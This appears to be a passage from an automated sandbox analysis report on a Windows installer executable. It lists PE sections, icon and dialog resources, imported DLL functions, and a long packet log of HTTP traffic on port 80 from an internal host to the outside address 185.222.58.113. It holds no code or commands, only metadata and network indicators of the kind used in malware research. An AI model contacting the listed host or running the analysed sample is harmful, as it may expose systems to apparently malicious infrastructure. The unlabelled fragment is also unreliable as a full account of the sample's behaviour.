                                          .text0x10000x660c0x68003b90adcd2f1248db844446cb2ef15486False0.6663912259615384data6.411908920093797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x80000x13400x1400b3bd9ad1bd1020c5cf4d51a4d7b61e07False0.4576171875data5.237673976044139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xa0000x251380x600c4e774255fea540ed5efa114edfa6420False0.4635416666666667data4.1635686587741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x300000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x430000x33c300x33e007fa7729fe4a0557bfedd7b90570ef402False0.497632718373494data6.34541536700329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x433880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.30904708387554714
                                          RT_ICON0x53bb00xb761PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867930557034827
                                          RT_ICON0x5f3180x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.3459112886272861
                                          RT_ICON0x687c00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.391913123844732
                                          RT_ICON0x6dc480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.4092465753424658
                                          RT_ICON0x71e700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.4437759336099585
                                          RT_ICON0x744180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.5302532833020638
                                          RT_ICON0x754c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.6196721311475409
                                          RT_ICON0x75e480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.6524822695035462
                                          RT_DIALOG0x762b00x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0x763b00x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0x764d00xc4dataEnglishUnited States0.5918367346938775
                                          RT_DIALOG0x765980x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0x765f80x84dataEnglishUnited States0.9242424242424242
                                          RT_VERSION0x766800x270dataEnglishUnited States0.5016025641025641
                                          RT_MANIFEST0x768f00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                          DLLImport
                                          ADVAPI32.dllRegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                                          SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                                          ole32.dllOleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                          USER32.dllSetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
                                          KERNEL32.dllCreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 1, 2024 12:26:38.282478094 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.504657984 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.504863024 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.508272886 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.730926037 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.730941057 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.731026888 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.731041908 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.731054068 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.731169939 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.731323957 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.953243971 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953291893 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953327894 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953360081 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953389883 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953419924 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953522921 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.953522921 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.953576088 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953615904 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953639984 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.953644991 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953669071 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:38.953768015 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.953768969 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:38.953809977 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.178936005 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179020882 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179035902 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179060936 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179074049 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179088116 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179116011 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179128885 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179141998 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179142952 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179167986 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179183006 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179195881 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179203033 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179203033 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179208994 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179219007 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179219007 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179219007 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179224014 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179236889 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179250002 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179260969 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.179301023 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179301023 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179301023 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179318905 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179318905 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179397106 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.179397106 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401415110 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401457071 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401511908 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401571989 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401585102 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401611090 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401619911 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401623964 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401635885 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401659012 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401670933 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401683092 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401695013 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401698112 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401698112 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401741982 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401741982 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401767969 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401793957 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401806116 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401806116 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401839018 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401839018 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401839018 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.401844025 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401881933 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401895046 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401933908 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401964903 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401979923 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.401992083 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402004004 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402015924 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402024984 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.402024984 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.402028084 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402040005 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402051926 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402064085 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402076006 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402087927 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402091026 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.402100086 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402112007 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402121067 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.402139902 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.402264118 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.402302980 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624155045 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624186039 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624231100 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624286890 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624300003 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624330044 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624330044 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624362946 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624377012 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624398947 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624413013 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624423981 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624424934 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624424934 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624445915 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624459982 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624470949 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624486923 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624494076 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624500036 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624500036 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624500036 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624505997 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624516964 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624527931 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624548912 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624561071 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624572039 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624583006 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624583006 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624594927 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624598026 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624607086 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624618053 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624629021 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624653101 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624665022 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624675989 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624680042 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624680042 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624696016 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624700069 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624700069 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624708891 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624721050 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624732018 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624749899 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624762058 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624773026 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624774933 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624783993 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624794960 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624805927 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624816895 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624828100 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624836922 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624836922 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624836922 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624836922 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624836922 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624872923 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624910116 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624922037 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624934912 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624955893 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624957085 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624957085 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.624964952 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624975920 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.624996901 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625010967 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625024080 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625035048 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625061035 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625061035 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625092030 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625092983 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625092983 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625092983 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625103951 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625114918 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625125885 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625137091 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625148058 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625159025 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625169992 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625173092 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625173092 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625173092 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625180960 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625191927 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625200033 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.625281096 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625339985 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.625364065 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847364902 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847445011 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847502947 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847516060 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847537041 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847549915 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847562075 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847573996 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847587109 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847587109 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847603083 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847616911 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847630978 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847651958 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847654104 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847726107 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847745895 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847745895 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847747087 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847748041 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847749949 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847749949 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847768068 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847769976 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847798109 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847847939 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847847939 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847847939 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847847939 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847847939 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847879887 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847879887 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.847881079 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847882032 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847882986 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847896099 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847956896 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.847999096 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848031044 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848031044 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848109961 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848109961 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848200083 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848215103 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848217964 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848218918 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848218918 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848220110 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848220110 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848258018 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848268032 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848279953 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848292112 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848304033 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848315954 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848335981 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848347902 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848360062 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848381042 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848392963 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848406076 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848417997 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848429918 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848442078 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848453999 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848465919 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848478079 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848489046 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848571062 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848573923 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848575115 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848575115 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848576069 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848577023 CEST8049755185.222.58.113192.168.11.30
